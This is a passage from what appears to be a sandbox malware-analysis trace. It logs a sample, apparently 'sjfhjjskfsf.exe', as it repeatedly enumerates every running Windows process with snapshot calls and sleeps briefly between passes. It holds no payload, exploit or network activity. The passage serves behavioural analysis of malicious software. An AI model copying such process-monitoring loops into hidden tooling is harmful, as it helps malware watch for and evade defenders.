th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.328] Process32NextW (in: hSnapshot=0x1e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.329] Sleep (dwMilliseconds=0x64) [0219.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ec [0219.432] Process32FirstW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.432] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.433] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.433] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.433] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.434] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.434] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.434] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.434] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.435] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.435] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.435] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.436] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.436] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.436] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.436] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.437] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.437] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.437] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.437] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.438] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.438] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.438] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.439] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.439] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.439] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.439] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.440] Process32NextW (in: hSnapshot=0x1ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.440] Sleep (dwMilliseconds=0x64) [0219.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f0 [0219.539] Process32FirstW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.540] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.540] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.540] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.540] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.541] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.541] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.541] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.541] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.542] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.542] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.542] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.543] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.543] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.543] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.543] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.544] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.544] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.544] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.545] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.545] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.545] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.545] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.546] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.546] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0219.546] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0219.546] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0219.547] Process32NextW (in: hSnapshot=0x1f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0219.547] Sleep (dwMilliseconds=0x64) [0219.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0219.664] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.664] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.665] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.666] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.667] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.667] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.667] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.668] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0219.669] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.670] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.671] Process32NextW (in: hSnapshot=0x1f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, 